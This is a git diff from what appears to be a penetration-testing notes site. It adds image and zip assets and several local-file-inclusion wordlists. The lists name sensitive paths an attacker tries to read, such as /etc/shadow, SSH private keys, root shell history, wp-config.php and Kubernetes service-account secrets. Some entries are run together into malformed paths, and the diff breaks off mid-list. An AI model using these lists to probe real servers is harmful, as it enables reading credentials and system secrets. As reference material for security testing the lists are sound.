Binary files /dev/null and b/.gitbook/assets/ine (1).png differ diff --git a/.gitbook/assets/ine.png b/.gitbook/assets/ine.png new file mode 100644 index 00000000000..c4828046ae6 Binary files /dev/null and b/.gitbook/assets/ine.png differ diff --git a/.gitbook/assets/ine_logo-1-.jpg b/.gitbook/assets/ine_logo-1-.jpg new file mode 100644 index 00000000000..4d978faa6a1 Binary files /dev/null and b/.gitbook/assets/ine_logo-1-.jpg differ diff --git a/.gitbook/assets/ine_logo-2-.jpg b/.gitbook/assets/ine_logo-2-.jpg new file mode 100644 index 00000000000..65368fd3d56 Binary files /dev/null and b/.gitbook/assets/ine_logo-2-.jpg differ diff --git a/.gitbook/assets/ine_logo-3-.jpg b/.gitbook/assets/ine_logo-3-.jpg new file mode 100644 index 00000000000..7b3d4c331a6 Binary files /dev/null and b/.gitbook/assets/ine_logo-3-.jpg differ diff --git a/.gitbook/assets/ine_logo.jpg b/.gitbook/assets/ine_logo.jpg new file mode 100644 index 00000000000..9f6a05dace8 Binary files /dev/null and b/.gitbook/assets/ine_logo.jpg differ diff --git a/src/images/intruder4 (1) (1).gif b/.gitbook/assets/intruder4 (1) (1) (1).gif similarity index 100% rename from src/images/intruder4 (1) (1).gif rename to .gitbook/assets/intruder4 (1) (1) (1).gif diff --git a/.gitbook/assets/intruder4 (1) (1).gif b/.gitbook/assets/intruder4 (1) (1).gif new file mode 100644 index 00000000000..75ac066e3db Binary files /dev/null and b/.gitbook/assets/intruder4 (1) (1).gif differ diff --git a/.gitbook/assets/legion (1).zip b/.gitbook/assets/legion (1).zip new file mode 100644 index 00000000000..1213031093d Binary files /dev/null and b/.gitbook/assets/legion (1).zip differ diff --git a/.gitbook/assets/legion (2).zip b/.gitbook/assets/legion (2).zip new file mode 100644 index 00000000000..91a2a7ac0a6 Binary files /dev/null and b/.gitbook/assets/legion (2).zip differ diff --git a/.gitbook/assets/legion.zip b/.gitbook/assets/legion.zip new file mode 100644 index 00000000000..1213031093d Binary files /dev/null and b/.gitbook/assets/legion.zip differ diff --git a/.gitbook/assets/lfi (1).txt b/.gitbook/assets/lfi (1).txt new file mode 100644 index 00000000000..28a6c9284a8 --- /dev/null +++ b/.gitbook/assets/lfi (1).txt @@ -0,0 +1,249 @@ +/apache/logs/access.log +/apache/logs/error.log +/apachephpphp.ini +/bin/php.ini +/ect/hostname +/etc/apache2/conf/httpd.conf +/etc/apache2/httpd.conf +/etc/apache/conf/httpd.conf +/etc/chrootUsersvar/log/xferlog +/etc/crontab +/etc/dovecot/dovecot.passwd +/etc/fstab +/etc/ftpchroot +/etc/ftphosts +/etc/group +/etc/hosts +/etc/httpd.conf +/etc/httpd/conf/httpd.conf +/etc/httpd/conf/httpd.confetc/http/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/httpd/logs/access.log +/etc/httpd/logs/access_logetc/httpd/logs/error_log +/etc/httpd/logs/access.logProgramFilesApacheGroupApachelogsaccess.log +/etc/httpd/logs/error.log +/etc/httpd/php.ini +/etc/http/httpd.conf +/etc/issue +/etc/logrotate.d/ftp +/etc/logrotate.d/proftpdwww/logs/proftpd.system.log +/etc/logrotate.d/vsftpd.log +/etc/motd +/etc/motdetc/passwd +/etc/my.cnf +/etc/mysql/my.cnf +/etc/netconfig +/etc/passwd +/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini +/etc/php4/apache2/php.ini +/etc/php4/cgi/php.ini +/etc/php5/apache2/php.ini +/etc/php5/apache/php.ini +/etc/php5/cgi/php.ini +/etc/php/apache2/php.ini +/etc/php/php4/php.inietc/php/apache/php.ini +/etc/php/php.ini +/etc/profile +/etc/proftp.conf +/etc/proftpd/modules.confvar/log/vsftpd.log +/etc/protpd/proftpd.conf +/etc/pure-ftpd.conf +/etc/pureftpd.pdbetc/pureftpd.passwd +/etc/pure-ftpd/pure-ftpd.conf +/etc/pure-ftpd/pure-ftpd.pdb +/etc/pure-ftpd/pureftpd.pdb +/etc/security/environetc/security/limits +/etc/security/group +/etc/security/passwd +/etc/security/user +/etc/shadow +/etc/sudoers +/etc/vhcs2/proftpd/proftpd.conf +/etc/vsftpd.chroot_list +/etc/vsftpd.conf +/etc/vsftpd/vsftpd.conf +/etc/wu-ftpd/ftpaccess +/etc/wu-ftpd/ftphosts +/etc/wu-ftpd/ftpusers +/home2binstableapachephp.inihomebinstableapachephp.ini +/logs/access_log +/logs/access.loglogs/error_log +/logs/error.log +/logs/pure-ftpd.log +/NetServerbinstableapachephp.ini +/opt/apache/conf/httpd.confopt/apache2/conf/httpd.conf +/opt/lampp/logs/access_logopt/lampp/logs/access.log +/opt/lampp/logs/error_log +/opt/lampp/logs/error.logopt/xampp/logs/access_log +/opt/xampp/etc/php.ini +/opt/xampp/logs/access.log +/opt/xampp/logs/error.log +/opt/xampp/logs/error_log +/php4php.ini +/php5php.ini +/phpphp.ini +/PHPphp.ini +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf.defaultVolumes/webBackup/opt/apache2/conf/httpd.conf +/proc/cmdline +/proc/mounts +/proc/net/arp +/proc/net/route +/proc/net/tcp +/proc/net/udp +/proc/sched_debug +/proc/self/cmdline +/proc/self/environ +/proc/self/fd/0 +/proc/self/fd/1 +/proc/self/fd/10 +/proc/self/fd/11 +/proc/self/fd/12 +/proc/self/fd/13 +/proc/self/fd/14 +/proc/self/fd/15 +/proc/self/fd/16 +/proc/self/fd/17 +/proc/self/fd/18 +/proc/self/fd/19 +/proc/self/fd/2 +/proc/self/fd/20 +/proc/self/fd/21 +/proc/self/fd/22 +/proc/self/fd/23 +/proc/self/fd/24 +/proc/self/fd/25 +/proc/self/fd/26 +/proc/self/fd/27 +/proc/self/fd/28 +/proc/self/fd/29 +/proc/self/fd/3 +/proc/self/fd/30 +/proc/self/fd/31 +/proc/self/fd/32 +/proc/self/fd/33 +/proc/self/fd/34 +/proc/self/fd/35 +/proc/self/fd/36 +/proc/self/fd/4proc/self/fd/5 +/proc/self/fd/6 +/proc/self/fd/7 +/proc/self/fd/8 +/proc/self/fd/9 +/proc/self/stat +/proc/self/status +/proc/self/statvar/log/apache2/error_log +/proc/version +/ProgramFilesApacheGroupApache2confhttpd.confProgramFilesxamppapacheconfhttpd.conf +/ProgramFilesApacheGroupApachelogserror.logusr/local/apache2/conf/httpd.conf +/root/.bash_history +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/usr/lib/php.ini +/usr/lib/php/php.ini +/usr/lib/security/mkuser.default +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.logvar/log/access_log +/usr/local/apache/conf/php.ini +/usr/local/apache/httpd.confusr/local/apache2/httpd.conf +/usr/local/apache/logs/access_log +/usr/local/apache/logs/access.logusr/local/apache/logs/error_log +/usr/local/apache/logs/error.log +/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf +/usr/local/cpanel/logs +/usr/local/cpanel/logs/error_log +/usr/local/cpanel/logs/license_log +/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log +/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log +/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf +/usr/local/etc/apache/vhosts.confetc/php.ini +/usr/local/etc/php.ini +/usr/local/etc/pure-ftpd.conf +/usr/local/etc/pureftpd.pdb +/usr/local/httpd/conf/httpd.conf +/usr/local/lib/php.iniusr/local/php/lib/php.ini +/usr/local/php4/httpd.conf +/usr/local/php4/httpd.conf.php +/usr/local/php4/lib/php.ini +/usr/local/php5/httpd.conf +/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf +/usr/local/php5/lib/php.ini +/usr/local/php/httpd.conf.php +/usr/local/pureftpd/etc/pure-ftpd.conf +/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl +/usr/local/Zend/etc/php.ini +/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/ +/usr/ports/ftp/pure-ftpd/ +/usr/ports/net/pure-ftpd/ +/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf +/var/adm/log/xferlog +/var/cpanel/cpanel.config +/var/lib/mysql/my.cnf +/var/local/www/conf/php.inietc/php/cgi/php.ini +/var/log/access.log +/var/log/apache2/access.log +/var/log/apache2/access_logvar/log/httpd/error_log +/var/log/apache/error.log +/var/log/cron.logvar/log/couchdb/couch.log +/var/log/dmessage +/var/log/error_log +/var/log/error.logvar/log/apache/access_log +/var/log/exim4/mainlog +/var/log/exim4_mainlog +/var/log/exim4/paniclog +/var/log/exim_mainlog +/var/log/exim/mainlogvar/log/maillog +/var/log/exim/paniclog +/var/log/exim_paniclog +/var/log/exim/rejectlog +/var/log/exim_rejectlog +/var/log/ftplog +/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy +/var/log/httpd/access.log +/var/log/httpd/access_log +/var/log/httpd/error.log +/var/log/mail +/var/log/mail.log +/var/log/messages +/var/log/mysqlderror.logvar/log/mysql/mysql.log +/var/log/mysql.log +/var/log/mysql/mysql-bin.log +/var/log/mysql/mysql-slow.log +/var/log/news +/var/log/nginx/access.logproc/self/cmdline +/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log +var/log/postgresql/postgresql-9.6-mail.log +/var/log/proftpd +/var/log/pureftpd.log +/var/log/pure-ftpd/pure-ftpd.log +/var/log/qmail +/var/log/redis/redis-server.log +/var/log/samba/log.smbd +/var/log/smtpd +/var/log/spooler +/var/log/syslog +/var/log/telnetd +/var/mail/root +/var/mysql.log +/var/spool/cron/crontabs/root +/var/www/conf/httpd.conf +/var/www/logs/access_logvar/www/logs/access.log +/var/www/logs/error.log +/var/www/logs/error_log +/var/www/mgr/logs/access.log +/var/www/mgr/logs/error_log +/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf +/web/conf/php.ini +/WINDOWSphp.iniWINNTphp.ini +/xamppapachebinphp.ini diff --git a/.gitbook/assets/lfi (2).txt b/.gitbook/assets/lfi (2).txt new file mode 100644 index 00000000000..57214136334 --- /dev/null +++ b/.gitbook/assets/lfi (2).txt @@ -0,0 +1 @@ +423 diff --git a/.gitbook/assets/lfi (3).txt b/.gitbook/assets/lfi (3).txt new file mode 100644 index 00000000000..dd887237f70 --- /dev/null +++ b/.gitbook/assets/lfi (3).txt @@ -0,0 +1,430 @@ +/apache/logs/access.log +/apache/logs/access_log +/apache/logs/error.log +/apache/logs/error_log +~/.atfp_history +~/.bash_history +~/.bash_logout +~/.bash_profile +~/.bashrc +/bin/php.ini +/defaultVolumes/webBackup/opt/apache2/conf/httpd.conf +/etc/anaconda-ks.cfg +/etc/anacrontab +/etc/apache2/apache2.conf +/etc/apache2/conf/httpd.conf +/etc/apache/conf/httpd.conf +/etc/at.allow +/etc/at.deny +/etc/bashrc +/etc/bootptab +/etc/centos-release +/etc/cesi.conf +/etc/chrootUsers +/etc/chrootUsersvar/log/xferlog +/etc/chttp.conf +/etc/cron.allow +/etc/cron.deny +/etc/crontab +/etc/cups/cupsd.conf +/etc/debconf.conf +/etc/debian_version +/etc/dovecot/dovecot.passwd +/etc/environment +/etc/fstab +/etc/ftpaccess +/etc/groups +/etc/grub.conf +/etc/gshadow +/etc/hostapd.conf +/etc/hostname +/etc/hosts.allow +/etc/hosts.deny +/etc/http/conf/httpd.conf +/etc/httpd/access.conf +/etc/httpd.conf +/etc/httpd/srm.conf +/etc/http/httpd.conf +/etc/inetd.conf +/etc/inittab +/etc/lighttpd.conf +/etc/lilo.conf +/etc/logrotate.d/proftpd +/etc/logrotate.d/proftpdwww/logs/proftpd.system.log +/etc/lsb-release +/etc/master.passwd +/etc/modules.conf +/etc/motdetc/passwd +/etc/mtab +/etc/my.conf +/etc/mysql/user.MYD +/etc/netconfig +/etc/network/interfaces +/etc/networks +/etc/npasswd +/etc/ntp.conf +/etc/os-release +/etc/php4.4/fcgi/php.ini +/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini +/etc/php4/apache/php.ini +/etc/php5/cgi/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php4/php.inietc/php/apache/php.ini +/etc/polkit-1/localauthority.conf.d/50-localauthority.conf +/etc/polkit-1/localauthority.conf.d/51-debian-sudo.conf +/etc/printcap +/etc/proftpd/modules.confvar/log/vsftpd.log +/etc/proftpd/proftpd.conf +/etc/protocols +/etc/protpd/proftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/pureftpd.pdbetc/pureftpd.passwd +/etc/pure-ftpd/pureftpd.pdb +/etc/pure-ftpd/putreftpd.pdb +/etc/rsyncd.conf +/etc/rsyslog.conf +/etc/redhat-release +/etc/samba/smb.conf +/etc/security/environetc/security/limits +/etc/security/group +/etc/security/passwd +/etc/security/user +/etc/services +/etc/shells +/etc/snmpd.conf +/etc/ssh/ssh_host_ecdsa_key +/etc/ssh/ssh_host_ecdsa_key.pub +/etc/ssh/ssh_host_key +/etc/ssh/ssh_host_key.pub +/etc/ssh/ssh_host_rsa_key +/etc/ssh/ssh_host_rsa_key.pub +/etc/sudoers +/etc/supervisord.conf +/etc/sysconfig/network +/etc/sysctl.conf +/etc/syslog.conf +/etc/system-release +/etc/termcap +/etc/timezone +/etc/tomcat/tomcat-users.xml +/etc/updatedb.conf +~/.gtkrc +/local/apache2/conf/httpd.conf +/log/apache2/error_log +~/.login +~/.logout +/logs/access.log +/logs/access_log +/logs/error.log +/logs/error_log +/logs/security_debug_log +/logs/security_log +~/.mysql_history +~/.nano_history +/opt/apache2/conf/httpd.conf +/opt/apache/conf/httpd.conf +/opt/lampp/etc/httpd.conf +/opt/lampp/logs/access.log +/opt/lampp/logs/access_log +/opt/lampp/logs/error_log +/opt/lampp/logs/error.logopt +/opt/xampp/logs/access.log +/opt/xampp/logs/error.log +/opt/xampp/logs/error_log +/php4php.ini +/php5php.ini +~/.php_history +/phpphp.ini +/PHPphp.ini +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf. +/proc/cpuinfo +/proc/filesystems +/proc/interrupts +/proc/ioports +/proc/meminfo +/proc/modules +/proc/self/cmdline +/proc/self/cwd/index.php +/proc/self/fd/0 +/proc/self/fd/1 +/proc/self/fd/10 +/proc/self/fd/100 +/proc/self/fd/11 +/proc/self/fd/12 +/proc/self/fd/13 +/proc/self/fd/14 +/proc/self/fd/15 +/proc/self/fd/16 +/proc/self/fd/17 +/proc/self/fd/18 +/proc/self/fd/19 +/proc/self/fd/2 +/proc/self/fd/20 +/proc/self/fd/21 +/proc/self/fd/22 +/proc/self/fd/23 +/proc/self/fd/24 +/proc/self/fd/25 +/proc/self/fd/26 +/proc/self/fd/27 +/proc/self/fd/28 +/proc/self/fd/29 +/proc/self/fd/3 +/proc/self/fd/30 +/proc/self/fd/31 +/proc/self/fd/32 +/proc/self/fd/33 +/proc/self/fd/34 +/proc/self/fd/35 +/proc/self/fd/36 +/proc/self/fd/37 +/proc/self/fd/38 +/proc/self/fd/39 +/proc/self/fd/4 +/proc/self/fd/41 +/proc/self/fd/42 +/proc/self/fd/43 +/proc/self/fd/44 +/proc/self/fd/45 +/proc/self/fd/46 +/proc/self/fd/47 +/proc/self/fd/48 +/proc/self/fd/49 +/proc/self/fd/5 +/proc/self/fd/51 +/proc/self/fd/52 +/proc/self/fd/53 +/proc/self/fd/54 +/proc/self/fd/55 +/proc/self/fd/56 +/proc/self/fd/57 +/proc/self/fd/58 +/proc/self/fd/59 +/proc/self/fd/6 +/proc/self/fd/61 +/proc/self/fd/62 +/proc/self/fd/63 +/proc/self/fd/64 +/proc/self/fd/65 +/proc/self/fd/66 +/proc/self/fd/67 +/proc/self/fd/68 +/proc/self/fd/69 +/proc/self/fd/7 +/proc/self/fd/71 +/proc/self/fd/72 +/proc/self/fd/73 +/proc/self/fd/74 +/proc/self/fd/75 +/proc/self/fd/76 +/proc/self/fd/77 +/proc/self/fd/78 +/proc/self/fd/79 +/proc/self/fd/8 +/proc/self/fd/81 +/proc/self/fd/82 +/proc/self/fd/83 +/proc/self/fd/84 +/proc/self/fd/85 +/proc/self/fd/86 +/proc/self/fd/87 +/proc/self/fd/88 +/proc/self/fd/89 +/proc/self/fd/9 +/proc/self/fd/91 +/proc/self/fd/92 +/proc/self/fd/93 +/proc/self/fd/94 +/proc/self/fd/95 +/proc/self/fd/96 +/proc/self/fd/97 +/proc/self/fd/98 +/proc/self/fd/99 +/proc/self/net/arp +/proc/self/stat +/proc/self/status +/proc/self/statvar +/proc/stat +/proc/swaps +~/.profile +/root/anaconda-ks.cfg +/root/.bash_history +/root/.ssh/authorized_hosts +/root/.ssh/authorized_keys +/root/.ssh/id_dsa +/root/.ssh/id_rsa +/root/.ssh/known_hosts +~/.ssh/authorized_keys +~/.ssh/id_dsa +~/.ssh/id_dsa.pub +~/.ssh/identity +~/.ssh/identity.pub +~/.ssh/id_rsa +~/.ssh/id_rsa.pub +/usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf +/usr/etc/pure-ftpd.conf +/usr/lib/security/mkuser.default +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/log/error_log +/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.logvar/log/access_log +/usr/local/apache/audit_log +/usr/local/apache/conf/modsec.conf +/usr/local/apache/error.log +/usr/local/apache/error_log +/usr/local/apache/httpd.confusr/local/apache2/httpd.conf +/usr/local/apache/log +/usr/local/apache/log/error_log +/usr/local/apache/logs +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access.logusr/local/apache/logs/error_log +/usr/local/apache/logs/error.log +/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf +/usr/local/cpanel/logs/access_log +/usr/local/cpanel/logs/login_log +/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log +/usr/local/cpanel/logs/stats_log +/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log +/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.conf +/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf +/usr/local/etc/apache/vhosts.confetc/php.ini +/usr/local/etc/httpd/logs/access_log +/usr/local/etc/httpd/logs/error_log +/usr/local/httpd/conf/httpd.conf +/usr/local/lib/php.ini +/usr/local/lib/php.iniusr/local/php/lib/php.ini +/usr/local/php5/httpd.conf.php +/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.ini +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini +/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl +/usr/local/pureftpd/etc/pureftpd.pdn +/usr/local/pureftpd/sbin/pure-config.pl +/usr/local/www/logs/httpd_log +/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/ +/usr/ports/ftp/pure-ftpd/ +/usr/ports/net/pure-ftpd/ +/usr/sbin/pure-config.pl +/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf +/usr/var/lib/mysql/debian.cnf +/usr/var/lib/mysql/my.cnf +/usr/var/lib/mysql/user.MYD +/var/apache2/config.inc +/var/apache/logs/access_log +/var/apache/logs/error_log +/var/htmp +/var/lib/mysql/debian.cnf +/var/lib/mysql/mysql/user.MYD +/var/lib/mysql/user.MYD +/var/local/www/conf/php.ini +/var/local/www/conf/php.inietc/php/cgi/php.ini +/var/log/access.log +/var/log/apache2/access_log +/var/log/apache2/access_logvar/log/httpd/error_log +/var/log/apache2/error.log +/var/log/apache2/error_log +/var/log/apache/access_log +/var/log/apache/error_log +/var/log/apache-ssl/access.log +/var/log/apache-ssl/error.log +/var/log/auth.log +/var/log/boot +/var/log/chttp.log +/var/log/cron.logvar/log/couchdb/couch.log +/var/log/cups/error.log +/var/log/daemon.log +/var/log/debug +/var/log/dmesg +/var/log/dmessage +/var/log/dpkg.log +/var/log/error_log +/var/log/error.logvar/log/apache/access_log +/var/log/exim4/mainlog +/var/log/exim4_mainlog +/var/log/exim4/paniclog +/var/log/exim/mainlog +/var/log/exim/mainlogvar/log/maillog +/var/log/exim.paniclog +/var/log/exim/paniclog +/var/log/faillog +/var/log/ftp-proxy +/var/log/ftp-proxy/ftp-proxy.log +/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy +/var/log/httpsd/ssl.access_log +/var/log/httpsd/ssl_log +/var/log/kern.log +/var/log/lastlog +/var/log/lighttpd/access.log +/var/log/lighttpd/error.log +/var/log/lighttpd/lighttpd.access.log +/var/log/lighttpd/lighttpd.error.log +/var/log/mail.info +/var/log/maillog +/var/log/mail.warn +/var/log/message +/var/log/mysqlderror.log +/var/log/mysqlderror.logvar/log/mysql/mysql.log +/var/log/mysql/mysql.log +/var/log/news +/var/log/nginx/access.log +/var/log/nginx/access.logproc/self/cmdline +/var/log/nginx/error.log +/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log +/var/log/postgresql/postgresql-9.6-mail.log +/var/log/qmail +/var/log/redis/redis-server.log +/var/log/samba/log.smbd +/var/log/secure +/var/log/smtpd +/var/log/spooler +/var/log/sshd.log +/var/log/syslog +/var/log/telnetd +/var/log/wtmp +/var/log/xferlog +/var/log/yum.log +/var/mail/root +/var/run/secrets/kubernetes.io/serviceaccount +/var/run/utmp +/var/webmin/miniserv.log +/var/www/conf/httpd.conf +/var/www/html/wordpress/wp-config.php +/var/www/html/wp/wp-config.php +/var/www/log/access_log +/var/www/log/error_log +/var/www/logs/access.log +/var/www/logs/access_log +/var/www/logs/access_logvar/www/logs/access.log +/var/www/mgr/logs/access.log +/var/www/mgr/logs/error_log +/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log +/var/www/wordpress/wp-config.php +/var/www/wp/wp-config.php +~/.viminfo +/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf +/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf +/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php +/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini +/Volumes/webBackup/private/etc/httpd/httpd.conf +/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf +/web/conf/php.ini +/WINDOWSphp.ini +/WINNTphp.ini +~/.wm_style +/xamppapachebinphp.ini +/xampp/logs/access_log +~/.Xdefaults +~/.xinitrc +~/.Xresources +~/.xsession \ No newline at end of file diff --git a/src/files/LFI-With-PHPInfo-Assistance.pdf b/.gitbook/assets/lfi-with-phpinfo-assistance.pdf similarity index 100% rename from src/files/LFI-With-PHPInfo-Assistance.pdf rename to .gitbook/assets/lfi-with-phpinfo-assistance.pdf diff --git a/.gitbook/assets/lfi.txt b/.gitbook/assets/lfi.txt new file mode 100644 index 00000000000..dd887237f70 --- /dev/null +++ b/.gitbook/assets/lfi.txt @@ -0,0 +1,430 @@ +/apache/logs/access.log +/apache/logs/access_log +/apache/logs/error.log +/apache/logs/error_log +~/.atfp_history +~/.bash_history +~/.bash_logout +~/.bash_profile +~/.bashrc +/bin/php.ini +/defaultVolumes/webBackup/opt/apache2/conf/httpd.conf +/etc/anaconda-ks.cfg +/etc/anacrontab +/etc/apache2/apache2.conf +/etc/apache2/conf/httpd.conf +/etc/apache/conf/httpd.conf +/etc/at.allow +/etc/at.deny +/etc/bashrc +/etc/bootptab +/etc/centos-release +/etc/cesi.conf +/etc/chrootUsers +/etc/chrootUsersvar/log/xferlog +/etc/chttp.conf +/etc/cron.allow +/etc/cron.deny +/etc/crontab +/etc/cups/cupsd.conf +/etc/debconf.conf +/etc/debian_version +/etc/dovecot/dovecot.passwd +/etc/environment +/etc/fstab +/etc/ftpaccess +/etc/groups +/etc/grub.conf +/etc/gshadow +/etc/hostapd.conf +/etc/hostname +/etc/hosts.allow +/etc/hosts.deny +/etc/http/conf/httpd.conf +/etc/httpd/access.conf +/etc/httpd.conf +/etc/httpd/srm.conf +/etc/http/httpd.conf +/etc/inetd.conf +/etc/inittab +/etc/lighttpd.conf +/etc/lilo.conf +/etc/logrotate.d/proftpd +/etc/logrotate.d/proftpdwww/logs/proftpd.system.log +/etc/lsb-release +/etc/master.passwd +/etc/modules.conf +/etc/motdetc/passwd +/etc/mtab +/etc/my.conf +/etc/mysql/user.MYD +/etc/netconfig +/etc/network/interfaces +/etc/networks +/etc/npasswd +/etc/ntp.conf +/etc/os-release +/etc/php4.4/fcgi/php.ini +/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini +/etc/php4/apache/php.ini +/etc/php5/cgi/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php4/php.inietc/php/apache/php.ini +/etc/polkit-1/localauthority.conf.d/50-localauthority.conf +/etc/polkit-1/localauthority.conf.d/51-debian-sudo.conf +/etc/printcap +/etc/proftpd/modules.confvar/log/vsftpd.log +/etc/proftpd/proftpd.conf +/etc/protocols +/etc/protpd/proftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb +/etc/pureftpd.pdbetc/pureftpd.passwd +/etc/pure-ftpd/pureftpd.pdb +/etc/pure-ftpd/putreftpd.pdb +/etc/rsyncd.conf +/etc/rsyslog.conf +/etc/redhat-release +/etc/samba/smb.conf +/etc/security/environetc/security/limits +/etc/security/group +/etc/security/passwd +/etc/security/user +/etc/services +/etc/shells +/etc/snmpd.conf +/etc/ssh/ssh_host_ecdsa_key +/etc/ssh/ssh_host_ecdsa_key.pub +/etc/ssh/ssh_host_key +/etc/ssh/ssh_host_key.pub +/etc/ssh/ssh_host_rsa_key +/etc/ssh/ssh_host_rsa_key.pub +/etc/sudoers +/etc/supervisord.conf +/etc/sysconfig/network +/etc/sysctl.conf +/etc/syslog.conf +/etc/system-release +/etc/termcap +/etc/timezone +/etc/tomcat/tomcat-users.xml +/etc/updatedb.conf +~/.gtkrc +/local/apache2/conf/httpd.conf +/log/apache2/error_log +~/.login +~/.logout +/logs/access.log +/logs/access_log +/logs/error.log +/logs/error_log +/logs/security_debug_log +/logs/security_log +~/.mysql_history +~/.nano_history +/opt/apache2/conf/httpd.conf +/opt/apache/conf/httpd.conf +/opt/lampp/etc/httpd.conf +/opt/lampp/logs/access.log +/opt/lampp/logs/access_log +/opt/lampp/logs/error_log +/opt/lampp/logs/error.logopt +/opt/xampp/logs/access.log +/opt/xampp/logs/error.log +/opt/xampp/logs/error_log +/php4php.ini +/php5php.ini +~/.php_history +/phpphp.ini +/PHPphp.ini +/private/etc/httpd/httpd.conf +/private/etc/httpd/httpd.conf. +/proc/cpuinfo +/proc/filesystems +/proc/interrupts +/proc/ioports +/proc/meminfo +/proc/modules +/proc/self/cmdline +/proc/self/cwd/index.php +/proc/self/fd/0 +/proc/self/fd/1 +/proc/self/fd/10 +/proc/self/fd/100 +/proc/self/fd/11 +/proc/self/fd/12 +/proc/self/fd/13 +/proc/self/fd/14 +/proc/self/fd/15 +/proc/self/fd/16 +/proc/self/fd/17 +/proc/self/fd/18 +/proc/self/fd/19 +/proc/self/fd/2 +/proc/self/fd/20 +/proc/self/fd/21 +/proc/self/fd/22 +/proc/self/fd/23 +/proc/self/fd/24 +/proc/self/fd/25 +/proc/self/fd/26 +/proc/self/fd/27 +/proc/self/fd/28 +/proc/self/fd/29 +/proc/self/fd/3 +/proc/self/fd/30 +/proc/self/fd/31 +/proc/self/fd/32 +/proc/self/fd/33 +/proc/self/fd/34 +/proc/self/fd/35 +/proc/self/fd/36 +/proc/self/fd/37 +/proc/self/fd/38 +/proc/self/fd/39 +/proc/self/fd/4 +/proc/self/fd/41 +/proc/self/fd/42 +/proc/self/fd/43 +/proc/self/fd/44 +/proc/self/fd/45 +/proc/self/fd/46 +/proc/self/fd/47 +/proc/self/fd/48 +/proc/self/fd/49 +/proc/self/fd/5 +/proc/self/fd/51 +/proc/self/fd/52 +/proc/self/fd/53 +/proc/self/fd/54 +/proc/self/fd/55 +/proc/self/fd/56 +/proc/self/fd/57 +/proc/self/fd/58 +/proc/self/fd/59 +/proc/self/fd/6 +/proc/self/fd/61 +/proc/self/fd/62 +/proc/self/fd/63 +/proc/self/fd/64 +/proc/self/fd/65 +/proc/self/fd/66 +/proc/self/fd/67 +/proc/self/fd/68 +/proc/self/fd/69 +/proc/self/fd/7 +/proc/self/fd/71 +/proc/self/fd/72 +/proc/self/fd/73 +/proc/self/fd/74 +/proc/self/fd/75 +/proc/self/fd/76 +/proc/self/fd/77 +/proc/self/fd/78 +/proc/self/fd/79 +/proc/self/fd/8 +/proc/self/fd/81 +/proc/self/fd/82 +/proc/self/fd/83 